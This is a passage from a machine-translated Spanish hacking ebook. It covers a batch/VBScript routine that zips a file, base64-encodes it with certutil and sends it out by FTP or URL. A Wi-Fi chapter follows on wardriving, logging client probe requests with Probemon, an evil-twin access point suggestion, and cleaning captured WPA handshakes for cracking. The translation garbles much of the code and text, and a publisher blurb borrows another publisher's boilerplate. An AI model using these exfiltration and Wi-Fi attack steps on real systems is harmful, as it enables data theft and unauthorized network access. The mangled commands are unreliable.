similares a Unix. Es una herramienta realmente útil para ejecutar ejecutables ligeros de bajo recurso para ejecutar bajo
Linux.
160
Machine Translated by Google
Ahora, ya que eligió la configuración requerida. Presiona compilar y mueve los archivos en el directorio de trabajo
de apache /var/ www/ html/
Hay una forma más rápida de compilar, afortunadamente, el convertidor Bat2Exe también admite el acceso a la
línea de comandos. Simplemente escriba '/?' bandera al comando vino para ver las opciones disponibles
vino Bat_To_Exe_Converter_\(Configuración\).exe /?
161
Machine Translated by Google
Uso: vino
La imagen es bastante autoexplicativa. Aquí hay un comando de ejemplo para una configuración similar que usamos con GUI, para la
Hay una manera de comprimir un archivo en formato zip usando un script VB (Visual Basic) a través de un archivo por lotes.
establecer TEMPDIR=c:
\temp123 establecer FILETOZIP=c:
\temp123\[Link] rmdir %TEMPDIR%
mkdir %TEMPDIR%
xcopy /s %FILETOZIP% %TEMPDIR%
echo Set objArgs = [Link] > _zipIt.vbs echo InputFolder
= objArgs(0) >> _zipIt.vbs echo ZipFile = objArgs(1) >> _zipIt.vbs
echo CreateObject ("[Link]").CreateTextFile(ZipFile,
True).Escribe "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs echo Set objShell = CreateObject( "[Link]ón")
>> _zipIt.vbs echo Establecer fuente = [Link](InputFolder).Items >> _zipIt.vbs echo
[Link](ZipFile).CopyHere(fuente) >> _zipIt.vbs echo [Link] 2000 >> _zipIt.vbs CScript _zipIt.vbs
%TEMPDIR% C:\%TEMPDIR%\[Link] pausa
Este es un script simplista que repite el código vbs en el archivo: _zipIt.vbs. Y ejecuta vbscript en segundo plano usando la utilidad
CScript . Luego creará automáticamente un archivo zip de los datos de [Link] Ahora, solo necesitamos codificar el archivo zip.
En realidad, Windows tiene una utilidad que codifica y decodifica base64 a texto sin formato y viceversa: una utilidad llamada certutil
• certutil -encode <nombre del archivo de entrada> <nombre del archivo de salida codificado>
• certutil -decode <nombre del archivo de entrada codificado> <nombre del archivo de salida decodificado>
162
Machine Translated by Google
Simplemente coloque el código justo después del archivo comprimido: para codificar C:\%TEMPDIR%\[Link]
-----INICIAR CERTIFICADO-----
UEsDBBQAAAAIAPwJ80ok6C9vjQEAAIgFAAAIAAAAZGF0YS50eHTVU9FKwzAUfa7g
P4x+wKKrdCJ3GWNuILM6rKCvsbtbw9qkJJmzfr1NSlk3BUFF9CnknHvPPbc5heFL
nnWeUWkuxcA/7Z74QwoP16ObuZJLnmGn6oUe+KkxxQUh2+22m/NESS2XppvInAg0
W6nWXKyIbSNF3UeeT33qgWA5UiWl0WmQZZ0eEId4EMdXl2MplnxFvfpWnR6k+EL7
vXAaTvtn/SA8D4JwHI6BWNzy+3qNmgekVqjPRhcSKviAHWQQmplyrty
AmnOxIZl7ToHexDFkZ2kMdkobkpnh21MOhGJKgtbaKEaQ2F4whwmCxRADkBXiLtG
IQUCwQOljcZbgY90yTJd0c3VUuTdZCA7Z0CcWYhYcsfEQub81c39+mMGPnWO2VOG
e5KNuY8o6+PAAQXSCheFX43f3w9f9ary56L3MB/15vHs0/SNJvE3w1d5S5nCxQzL
unuNpduwYFrPU8WsRIO5guqdTLUjLpoBO6ARiJhBxVlGOctbX73NODft0f/yL+gc
H70BUEsBAhQAFAAAAAgA / AnzSiToL2 + NAQAAiAUAAAgAAAAAAAAAAQAgAAAAAAAA
AGRhdGEudHh0UEsFBgAAAAABAAEANgAAALMBAAAAAA ==
-----FIN DEL CERTIFICADO-----
Todo lo que necesita hacer es almacenar esta salida de archivo como variable y pasarla a lo largo de la URL que hicimos
anteriormente
O envíe el archivo directamente a través de FTP y luego decodifique el texto usando la función certutil -decode.
@echo off
echo usuario fix@[Link] > [Link]
163
Machine Translated by Google
¿Tarea?
Ahora puede llevar algo de tiempo organizarlo, pero vale la pena aprenderlo.
164
Machine Translated by Google
10
Hackeo de Wi-Fi
[Apéndice]
La conducción de guerra, también llamada mapeo de puntos de acceso, es el acto de ubicar y posiblemente
explotar conexiones a redes de área local inalámbricas mientras se conduce por una ciudad o en otro lugar.
Aquí no hay ningún "pirateo", pero se puede usar en el "pirateo" de Wi-Fi de largo alcance para saber dónde
girar su antena direccional.
Si ya hay uno y me lo perdí, entonces pido disculpas.
Cálculo de la ubicación aproximada de los AP, en función de la intensidad de sus señales y la posición GPS de
cada intensidad de señal anotada, que obtenemos (capturamos) mientras conducimos/caminamos con nuestro
dispositivo Wi-Fi sincronizado con el dispositivo GPS.
165
Machine Translated by Google
En punto, donde los tres círculos se encuentran es la ubicación teórica de AP, marcada con un círculo rojo.
Para la presentación, utilicé solo 3 ubicaciones para que fuera lo más simple posible, pero con más ubicaciones
registradas, la ubicación AP calculada será más precisa.
¿Cómo hacerlo?
Necesitarás un dispositivo con GPS y un dispositivo portátil (laptop o computadora tipo raspberry-pi)
y una antena externa preferible (la intensidad de la señal desde un automóvil es mejor y no desea conducir su computadora
portátil en el techo).
Eso es mucho trabajo que tal vez esté fuera del alcance de este libro, pero utilizaremos el wardriving para
nuestro beneficio, por ejemplo, para encontrar nuestros dispositivos robados. Por lo general, hay menos posibilidades,
pero vale la pena intentarlo. Quién sabe dónde encuentras tu costosa máquina.
166
Machine Translated by Google
Instalación
clon de git [Link]
prueba de cd
chmod +x [Link] actualizació[Link]
./[Link] --ayuda #Para el menú de ayuda
Uso
uso: [Link] [-h] [-i INTERFAZ] [-t TIEMPO] [-o SALIDA] [-b MAX_BYTES]
[-c MAX_BACKUPS] [-d DELIMITADOR] [-f] [-s] [-r] [-D] [-l]
una herramienta de línea de comandos para registrar tramas de solicitud de sonda 802.11
argumentos opcionales:
-h, --help -i mostrar este mensaje de ayuda y salir
INTERFAZ, --interface INTERFAZ -t TIEMPO, -- interfaz de captura
time TIEMPO -o SALIDA, --output SALIDA -b formato de hora de salida (unix, iso)
MAX_BYTES, --max-bytes MAX_BYTES -c ubicación de salida de registro
MAX_BACKUPS, --max-backups MAX_BACKUPS tamaño máximo de registro en bytes antes de rotar
número máximo de archivos de registro para mantener
-d DELIMITER, --delimiter DELIMITER campo de salida delimitador
-f, --mac-info incluye el fabricante de la dirección MAC
-s, --ssid -r, -- incluir el SSID de la sonda en la salida
rssi incluir rssi en la salida
-D, --depuración habilitar la salida de depuración
-l, --registro habilitar la vista en vivo de desplazamiento del archivo de registro
Para comenzar a rastrear marcos de baliza, primero coloque la tarjeta inalámbrica en modo monitor
servicio administrador de red detener #si no se elimina, Probemon no funcionará (en modo administrado)
ifconfig wlan0 inactivo iwconfig wlan0 #déjalo para cambiar el modo operativo
mode monitor ifconfig wlan0 activo #ejecutar iwconfig para verificar modo:monitor
#subir la interfaz
ejecute Probemon con las opciones requeridas, es decir, mac-info, ssid, intensidad de la señal (rssi) y desplazamiento en vivo
167
Machine Translated by Google
./[Link] -f -s -r -l -i wlan0
1500286780 [Link] -75 Equipo de comunicación Gionee Co., Ltd.
1500286780 [Link] -21 Apple Inc.
1500286781 [Link] -71 Foxconn (NanJing) Communication Co., Ltd.
1500286782 [Link] -77 Motorola Mobility LLC, una empresa de Lenovo
1500286785 88: 28: b3: a6: 5c: 40 -71 TECNOLOGÍAS CO., LTD DE HUAWEI
1500286786 [Link] -75 Equipo de comunicación Gionee Co., Ltd.
Desglose de salida:
Columna 1: marca de tiempo de Unix
También puede minimizar la consulta de entrada apilando todos los parámetros juntos
Tenga en cuenta que el parámetro que requiere un valor (-i) se mantiene al final para que podamos pasarle el nombre de la
interfaz (valor requerido)
Suponiendo que ya tiene la dirección MAC de la máquina robada, querrá filtrar la salida para la dirección MAC
deseada. Use grep para filtrar la salida en vivo
Guarde solo los SSID que los clientes están buscando y mapee su localidad. ¡Prepare un ataque utilizando un punto de acceso falso con el
SSID más popular y utilícelos a todos!
Un identificador único organizacional (OUI) es un número de 24 bits que identifica de manera única a un
proveedor, fabricante u otra organización.
En las direcciones MAC, el OUI se combina con un número de 24 bits (asignado por el propietario o
"cesionario" del OUI) para formar la dirección. Los tres primeros octetos ([Link]) de la dirección son el OUI.
Usando la lista OUI, podemos identificar fácilmente la dirección MAC o el dispositivo deseado de un proveedor
específico en tiempo real.
168
Machine Translated by Google
Probemon usa netaddr, una biblioteca de manipulación de direcciones de red para Python. Nos permite buscar
información única de la organización IEEE (OUI, IAB).
Probemon es un script realmente bueno con muchas características útiles como el desplazamiento en vivo (--log), el
indicador de intensidad de la señal recibida (--rssi) para la intensidad de la señal del cliente. Incluso muestra el proveedor
del dispositivo detectado, pero no hay opción para actualizar la lista OUI dentro del script, por lo que tengo que escribir
una pequeña solución para actualizar el script.
Vea [Link] en la carpeta de Probemon, simplemente ejecútelo para actualizar la base de datos de OUI.
Mover a netaddr/eui.
cd "/usr/local/lib/python2.7/dist-packages/netaddr/eui/"
mv [Link] [Link]
wget "[Link]
[Link] detecta el [Link] e inserta los datos disponibles en el archivo de la base de datos ([Link], [Link])
169
Machine Translated by Google
Muy a menudo terminamos con un apretón de manos inválido y no hace más que desperdiciar nuestro valioso tiempo durante
las pruebas de penetración.
Se debe verificar previamente la existencia de un Handshake WPA/2 válido. Esta verificación podría ahorrarle innumerables
horas desperdiciadas.
Usaremos Wireshark para analizar y extraer protocolos de enlace WPA/2 válidos de los archivos de captura.
Requisitos:
Ya debes tener un apretón de manos
Aplique un filtro de visualización al archivo .cap para que solo veamos lo que necesitamos.
Necesitamos ver marcos de baliza y eapol.
Filtro Wireshark:
Desglose de comandos:
170
Machine Translated by Google
2. Haga clic derecho en el marco de la baliza y seleccione "Marcar paquete (Alternar)". Ahora el faro
el marco debe ser negro porque está marcado.
3. Ahora que tenemos una baliza seleccionada, necesitamos dos paquetes más marcados como clave 1
y 2 del apretón de manos de 4 vías
Podrías hacer los cuatro, pero no es necesario. Puede ver partes del apretón de manos en la columna de información,
etiquetadas como "clave (mensaje 1/4)", etc.
Debe tener la baliza que ya marcamos y, además, marcar el mensaje clave 1/4 y el mensaje clave 2/4 haciendo clic con el
botón derecho en el paquete y seleccionando la opción Marcar paquete.
Las partes 1 y 2 del apretón de manos deben estar en el orden correcto o el apretón de manos no será válido
y nunca agrietarse.
3. Seleccione "Solo paquetes marcados" para guardar solo los paquetes de protocolo de enlace correctos .
Si todo salió bien, verá 1 apretón de manos porque eso es todo lo que hay en el archivo pcap. • Si ESSID está
ausente, eso significa que no recibió el paquete de baliza. • Si no hay un apretón de manos, significa que
no recibió los mensajes clave correctos.
Ahora que tiene un archivo pcap limpio, puede convertirlo en un archivo hccap para usarlo con hashcat.
Aircrack hace la conversión.
171
Machine Translated by Google
Como ya sabrá, pyrit puede analizar los archivos de protocolo de enlace y decirle de una manera bastante críptica si su
protocolo de enlace es bueno o no. No siempre es correcto. aircrack-ng también tiene algunos problemas para verificar
si los apretones de manos son válidos.
Usaremos las mismas técnicas discutidas anteriormente para extraer y modificar el contenido de los archivos .cap.
Independientemente de lo que informen los programas, probé todos los ejemplos a continuación y todos los ejemplos se
pueden descifrar, excepto el ejemplo 4.
Ejemplo 1:
Nuestro archivo de tapa previamente limpiado que sabemos tiene un buen apretón de manos.
Aircrack-ng dice que es bueno. (aircrack es correcto porque se rompe con éxito)
172
Machine Translated by Google
Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40
Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88
EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86
Ejemplo 2:
Pyrit ama sus paquetes de mensajes 3 y 4, por lo que le daremos algunos, de la misma secuencia que los
mensajes 1 y 2, por supuesto.
Pyrit está feliz de tener las cuatro partes del apretón de manos, pero etiqueta el archivo de captura
como "viable". Aircrack pudo descifrarlo como antes.
Ejemplo 3:
al seleccionar paquetes ubicados más juntos, Pyrit ahora informa la captura como "buena" en lugar
de "viable".
173
Machine Translated by Google
Ejemplo 4:
En este ejemplo, elegí el mensaje clave 4 de una secuencia diferente de 1, 2 y 3.
Aircrack-ng no puede decir que los paquetes m1 y m2 están fuera de secuencia y piensa que hay un apretón de
manos válido. Se ejecutará para siempre o hasta que agote la lista de palabras que puede desperdiciar
cientos, si no miles de horas.
Conclusión:
Pyrit a menudo informa que los archivos cap buenos son malos, y eso es algo malo. Aircrack-ng puede reportar
archivos malos como buenos, y eso es peor. Revise sus propios archivos de tapas y elimine lo que no necesita.
Y recuerda, mantente en una secuencia.
174
Machine Translated by Google
Acerca de rootsh3ll
rootsh3ll, pronunciado "root-shell", publicó su primer libro, Mastering phpMyAdmin for Effective MySQL Management,
en abril de 2004 y, posteriormente, continuó especializándose en la publicación de libros muy centrados en tecnologías
y soluciones específicas.
Nuestros libros y publicaciones comparten las experiencias de sus compañeros profesionales de TI en la
adaptación y personalización de los sistemas, aplicaciones y marcos actuales. Nuestros libros basados en
soluciones le brindan el conocimiento y el poder para personalizar el software y las tecnologías que está utilizando para
realizar el trabajo. Los libros Packt son más específicos y menos generales que los libros de TI que ha visto en el
pasado. Nuestro modelo comercial único nos permite brindarle información más enfocada, brindándole más de lo que
necesita saber y menos de lo que no.
Packt es una compañía editorial moderna pero única que se enfoca en producir libros innovadores y de calidad
para comunidades de desarrolladores, administradores y novatos por igual. Para obtener más información, visite
nuestro sitio web en [Link].
Puede convertirse en afiliado de este libro electrónico, donde gana el 50% del precio de venta vendiéndolo a sus
amigos o siguiéndolos.
Simplemente envíeme un mensaje a mi correo electrónico personal con el título "Afiliado de KLWPS" con la identificación
de correo electrónico con la que compró este libro electrónico en el contenido y le daré un código de cupón especial que
puede usar para enviar sus clientes potenciales al comprar este libro electrónico .
Entonces, ¿por qué esperar? Solo envíame un correo electrónico a harry@[Link] y ganemos juntos.
175